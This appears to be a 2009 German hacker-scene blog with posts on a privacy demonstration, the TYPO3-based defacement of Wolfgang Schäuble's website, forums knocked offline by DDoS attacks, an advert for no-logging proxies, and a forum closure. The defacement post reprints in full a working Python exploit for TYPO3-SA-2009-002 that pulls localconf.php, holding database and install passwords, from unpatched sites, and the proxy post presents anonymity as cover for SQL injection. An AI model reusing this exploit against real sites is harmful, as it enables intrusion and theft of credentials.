Datenschutzdemo am Aschermittwoch

Hab gerade mitbekommen, dass in Mainz eine Datenschutzdemo am Aschermittwoch statt findet. Waere das nicht so weit weg, waere ich auch mitgekommen 😉

“Wir machen eine kleine Demo mit Infostand, verteilen Flyer und zeigen unseren Protest gegen die Überwachungspolitik der Bundesregierung und der Großen Koalition auf Transparenten”, kündigen die Überwachungsgegner an. Treffen ist um 17 Uhr, eine Stunde vor dem geplanten Auftritt Schäubles, vor dem Anwesen der Wormser Straße 201 in Mainz.

“Bei dieser Gelegenheit werden wir Herrn Schäuble zeigen, dass wir den fortschreitenden Grundrechteabbau und die Überwachungspolitik der Bundesregierung nicht akzeptieren. Schon bei Schäubles letztem Besuch in Mainz-Bingen haben wir unseren Protest zum Ausdruck gebracht. Der Innenminister muss bei jedem Auftritt spüren, dass seine Überwachungspolitik in der Bevölkerung auf Widerstand stößt. Wir rufen alle Menschen aus Mainz und Umgebung dazu auf, am Mittwoch für eine neue, freiheitsfreundliche Innenpolitik zu demonstrieren. Freiheit muss wieder einen entscheidenden Stellwert erlangen, unsere Grundrechte dürfen nicht durch immer neue und schärfere Überwachungsgesetze ausgehöhlt werden. Überwachung erzeugt Angst und verhindert kritische Reflexion und freie Meinungsäußerung. Sie ebnet den Weg in eine kritiklose Gesellschaft”, erklären die Aktivisten ihre Ziele im Demo-Aufruf. Sie fordern eine Überprüfung bestehender Überwachungsmaßnahmen und einen Abbau besonders drastischer Maßnahmen wie der Vorratsdatenspeicherung sowie einen sofortigen Stopp bei der Einführung neuer Überwachungsbefugnisse.

Organisiert wird das ganze von

einem Aktionsbündnis bestehend aus der Grünen Jugend, der Linksjugend [solid], der Piratenpartei, dem Arbeitskreis Vorratsdatenspeicherung, dem Chaos Computer Club und der LandesschülerInnenvertretung Rheinland-Pfalz.

Quelle: http://www.gulli.com/news/mainz-datenschutzdemo-am-2009-02-22/

Find ich gut, ich hoff das sowas mal in Stuttgart stattfindet, dann werde ich (ganz bestimmt) mit Patrick_B aka Nazrek auch dabei sein 🙂

Im Laufe des heutigen Tages folgt dann noch entweder eine neue Sicherheitsluecke, welche ich aufdecke oder nen kleines Tutorial ueber Truecrypt, wenn wir grad beim Thema Datenschutz sind 😉

Website von Wolfgang Schäuble defaced

Wie sicherlich einige, oder ich denk mal alle ( 😀 ) mitbekommen haben, wurde die Seite von unserem Innenminister (isser doch, oder?) Wolfgang Schäuble defaced. Grund dafuer war eine Sicherheitsluecke im CMS (Content-Management-System) Typo3.

Die Folgen durch das Ausnutzen der Schwachstelle könnten für den jeweiligen Betreiber weit reichend sein. Grund dafür ist unter anderem der mögliche Zugriff auf die Datei localconf.php. In dieser befindet sich das Passwort für das Installations-Setup sowie der Benutzername und das zugehörige Kennwort für die Datenbank. Nach eingehender Betrachtung konnten die Experten den Fehler ausfindig machen. Dieser soll im Zusammenhang mit der jumpUrl-Funktion zum Analysieren der Webzugriffe bestehen.

Typo3, CMS, Typo, Typo3 LogoLaut den offiziellen Angaben sind die Versionen 3.3.x, 3.5.x, 3.6.x, 3.7.x, 3.8.x, 4.0 bis 4.0.11, 4.1.0 bis 4.1.9, 4.2.0 bis 4.2.5 und die Alphaversion 4.3 von dieser Problematik betroffen. Ein zur Verfügung gestelltes Update auf die Versionen 4.0.12, 4.1.10 und 4.2.6 soll diesem Sachverhalt Abhilfe schaffen.

Quelle: http://www.gulli.com/news/typo3-kritische-schwachstelle-2009-02-10/

Sah dort dann etwa so aus:

Oben ein Link zu Vorratsdatenspeicherung.de/ und Links in der Leiste in Link zum Update auf die Neuste Version und die Bitte, das PW zu aendern.

Ist ja nicht das erste mal, das Schäubles Page defaced wurde, jedoch finde ich das irgendwie sinnlos, da es eher nen Eigentor war und ihn selber nur weiter dazu bringt, mehr auf Ueberwachung zu setzen, damit sowas nicht mehr anonym passieren kann.

Mehr zu dem Thema:
http://computer.t-online.de/c/17/64/27/90/17642790.html
http://www.heise.de/security/Website-von-Wolfgang-Schaeuble-ueber-Typo3-Luecke-gehackt-Update–/news/meldung/132315
http://www.gulli.com/news/typo3-kritische-schwachstelle-2009-02-10/

Laut heise.de war das Passwort “gewinner”, was mich wundert, da das Passwort soviel ich weiß beim Ersten Deface schon gewinner war…

Wer das Typo3 Exploit sehen will:

#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
#       typo3-sa-2009-002.py   (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek

import urllib,re,sys

strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')

def useme():
    print sys.argv[0], ' (with http://)  (defaults to typo3conf/localconf.php)'
    sys.exit(0)

def parsehash(host, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '3:'})
    url = host + '/?' + file
    try:
        s = urllib.urlopen(url)
        r = s.read()
    except Exception, e:
        print '[!] - ', str(e)
        return None

    tmp = strip.match(r)
    if tmp:
        return tmp.group(1)
    else:
        return None

def content(host, hash, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '3:', 'juHash' : hash})
    url = host + '/?' + file
    try:
        s = urllib.urlopen(url)
        print '[+] - content of:', f
        print s.read()
    except:
        print '[!] - FAIL'

def main():
    if len(sys.argv) < 2:
        useme()

    if len(sys.argv) < 3:
        file = 'typo3conf/localconf.php'
    else:
        file = sys.argv[2]

    print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'
    print '[+] - checking typo3 installation on...'

    hash = parsehash(sys.argv[1], file)

    if not hash:
        print '[!] - version already fixed or 42 went wrong while trying to get the hash'
        sys.exit(234)

    content(sys.argv[1], hash, file)


if __name__ == '__main__':
    main()

# milw0rm.com [2009-02-10]

http://milw0rm.com/exploits/8038

Wochenuebersicht

Heyho,

hier ist eine kleine Wochen Uebersicht mit nen paar, naja, “News” was in dieser Woche alles vorgefallen ist.

1) Codesoft.cc macht Pause

Codesoft.cc und seine Scene Tools werden ab dem 1. Maerz 2009 bis gegen Herbst/Winter offline gehen.

Warum?

Der Grund für die Pause bin ich (tr1p0d). Ich werde für min. 6 Monate lang weg sein und wärend dieser Zeit hab ich (selbst wenn ich wollte) keine Chance On zu kommen. Wieso das genau muss die Breite Oeffentlichkeit nicht wissen. Es ist einfach so.

Ich habe zuerst gedacht das man evt. nen Nachfolger für mich finden könnte der alles Leitet und ein guter Coder ist. Jedoch habe ich dann das ganze Zerschlagen weil das ganze Team auch einwenig Ausgelaugt ist und wir Gemeinsam Schlussendlich beschlossen haben die Pause einzulegen. Wären dieser Zeit können wir alle wieder Energie und vorallem NEUE Ideen Sammeln. Im Moment kommen viele Projekte hoch wo man aber genau sieht das sie nur ein Abklatsch sind von einem andern wie z.B von Uns. Wir wollen euch aber Neues Bieten und das wird es alles auch geben wenn wir wieder kommen. Kopieren kann jeder, neues schaffen nicht 😉

Jedoch, sie kommen wieder, keine Frage 😉

Quelle: http://board.codesoft.cc/showthread.php?t=6375

2) FrEe-hAcK down?!

FrEe-hAcK.com ist mal wieder down/offline. Doch warum?

Am frühen Montagabend wurde die Last eines Angriffes so groß, das wir den Server vom Netz nehmen mussten. Zwischenzeitlich prasselten ~300mbps auf den Server ein. Fazit, wir mussten die IP nullrouten. Es wird zur Zeit am neuen Server gerarbeitet. Wieviel Zeit wir noch benötigen kann ich leider nicht abschätzen.
Ich hatte gehofft Free-Hack bereits am Dienstag wieder in Betrieb zu nehmen, dem war nicht so. Und das ist auch der Grund wieso hier so spät erst ein Beitrag erscheint. Sollte es Neuigkeiten geben, erfahrt ihr sie hier.

Quelle: http://blog.free-hack.com/?p=37

Jedoch werden sie, laut eigenen Angaben, vielleicht morgen wieder Online kommen 🙂

3) ToKrew.info macht zu

Ein eher nicht so bekanntes Forum macht zu. Alte News aber auch die sollte man erwaehnen und es ist gut, dass der Admin es selber auch eingesehen hat und nicht wie andere reagiert.

Warum?

Dieses Board war als allererstes für die Birfrost-world Mitglieder gedacht .
Ich wollte nie ein eigenes Forum leiten sondern nur meinen Teammembern ein neues zu Hause bieten …
Den ich war S-Mod bei Bifrost und Koksi (Der Admin) hat dieses Projekt total vernachlässigt , bis Dateiload schlussendlich den Server kündigte 😉

Warum Ich nun letzendlich das Projekt TOKREW einstelle:
Ich hab nen Sprung auf meiner KarriereLeiter gemacht und zwar nach oben was aber meine Freizeit ziemlich vermindert .
Da hier aber ehh nicht die Welt los ist hören wir an dieser Stelle auf ich beendige auch so meine Zeit in “der Scene” da Ich mich nun schöneren Dingen im Leben wittme .

Quelle: http://www.tokrew.info/forum/index.php?topic=1098.0

Und nun der letzte Punkt betrifft meinen Blog selber, wie einige mitbekommen haben gab es eine lange Downtime und hier ist ein kleines Statement (Zitat aus dem Newsletter):

Seit nunmehr 48 Stunden stehen alle Server unter DDOS mit mehreren hundert mbits Bandbreite.
Da die Server standartmäßig eine Anbindung von hundert Mbit haben ist eine Abwehr der Angriffe zur Zeit nicht möglich.

Jedoch wird das demnaechst wieder besser werden, denk ich 🙂

Am Wochende kommt vllt Teil 4 von meiner SQL Injections Tutorials Reihe, wenn nicht etwas anderes interessantes 😉

Wuensch euch allen nen schoenes Wochenende 🙂

P.S. Wenn ihr in der naechsten Wochenuebersicht dabei sein wollt, kontaktiert mich, mehr Infos unter “Contact”.

SceneProxy.org – High anonymous Socks

Ich moecht euch heute SceneProxy.org vorstellen.

Warum mache ich auf dieses Projekt aufmerksam? Naja ein Grund ist, dass ich Floo kenne, aber auch da Proxys bzw Socks in der “Szene” wichtiger sind als damals. Damals hatte es keine Sau gejuckt bei ner SQL Injection oder aehnliches, heutzutage loggt jede Page alles, einfach schlimm.. ^^

Ich biete euch:

Ich biete euch SSH und HTTPS-Proxies an

  • 100% Nonlogging
  • Sehr sicher
  • Gute Anbindung
  • Location: Russland

Die Proxies wurden auf den Servern von www.heihachi.net aufgesetzt, sind somit extrem sicher.

Der Vorteil an SSH-Proxies:
Der Traffic wird zusätzlich noch verschlüsselt, somit habt ihr eine abhörsichere und direkte Tunnelung zu den Servern, die aufgestellt wurden.

Ich garantiere 30 Tage Uptime, kein Tag weniger oder mehr.
Nonblacklist ist wahrscheinlich, jedoch nicht garantiert.
Sollte der Server ausfallen wird euch die verlorene Zeit gutgeschrieben.

Solltet ihr euch für die HTTPS-Variante entscheiden:
Diese hat auch gewisse Vorteile gegenüber der SSH-Variante, wie zum Beispiel eine unkomplizierte Einbindung direkt in die Browsereinstellung.

Die Proxies sind zum anonymen surfen geeignet.
Es ist verboten den Dienst für Spamming zu missbrauchen!!
Wer seine Logindaten weitergibt wird ohne Vorwarnung vom Dienst ausgeschlossen

Wie installiere ich den Proxy?
HTTPS-Proxy:
Proxifier downloaden, Logindaten eingeben und als Proxytyp HTTPS angeben.
IP-Adresse und Port wird dir im Supportsystem mitgeteilt.

SSH-Proxy:
Tunnelier downloaden und die Profildatei laden, welche wir dir im Supportsystem zukommen lassen werde.
Proxifier downloaden, Logindaten eingeben und als Proxytyp HTTPS angeben.
Als IP-Adresse wird 127.0.0.1 angegeben, als Port 10000

Preis: 10€/30 Tage

Ich nehme offline erworbene Paysafecards ohne Geheimfrage an und Webmoney (NEU)

Wie bestelle ich?
Ihr meldet euch im Supportsystem vom Proxyshop, der unter http://sceneproxy.org erreichbar ist.
Sollte kein Supporter online sein, so hinterlasst euren gewünschten Loginname, euer Loginpasswort und den Paysafecardcode (inkl. Passwort) und tragt unbedingt eure echte Mailadresse ein, an die alles wichtige geschickt wird.
Auf der Homepage ist nochmals eine kleine FAQ.

Wir haben unsere Supporter, die für euch gerne Fragen beantworten.
Nutzt das System, damit eine spätere Zuordnung vereinfacht werden kann”

Effektiv Werben auf J0hnX3r.org – kleiner spaß 😉

Statement zu Universalcrew.org

Hi,

da universalcrew.org seit einigen Monaten leider nicht mehr zu Erreichen ist, wuerde ich gerne ein kleines Statement dazu abgeben, da ich dort ja S-Moderator war.

Es fing so an, dass die Admins Devil & iLLu444 Werbung fuer das Forum bei 1337crew gepostet hatten (meine Meinung dazu kennen denk ich einige und ich will dazu auch keine Kommentare sagen) und naja.. dann fing es schon an und einige dort posteten sinnlose Kommentare. Irgendwann meinten 2 Member von 1337crew einen auf “Wie viel haelt der Server aus? Wetten ich bekomm euch in  2 min down” zu machen und meinten sie muessten das Forum DDoSen.

Das sah am Ende dann etwa so aus:

Aufjedenfall ging es dann weiter bis.. der Hoster dies nicht mehr akzeptierte und den Account sperrte. Entweder wir wuerden auf einen staerkeren Server wechseln oder wir sollten uns nen neuen Hoster suchen. Kann man ja auch verstehen, da die anderen Kunden die aufm gleichen Server hosten ja dann auch Probleme bekommen wegen nicht Erreichbarkeit. Aufjedenfall war Universalcrew nun also nicht mehr erreichbar.. was sie leider bis heute immernoch nicht ist, da sich iLLu444 nicht mehr meldet. Und nur er allein kann (oder konnte) ein Backup vom Hoster holen/verlangen..

Ob Universal Crew zurueck kommt oder nicht weiß ich nicht, ich wollte nur das die meisten von euch nun wissen, warum es Universal Crew (im moment) nicht mehr gibt.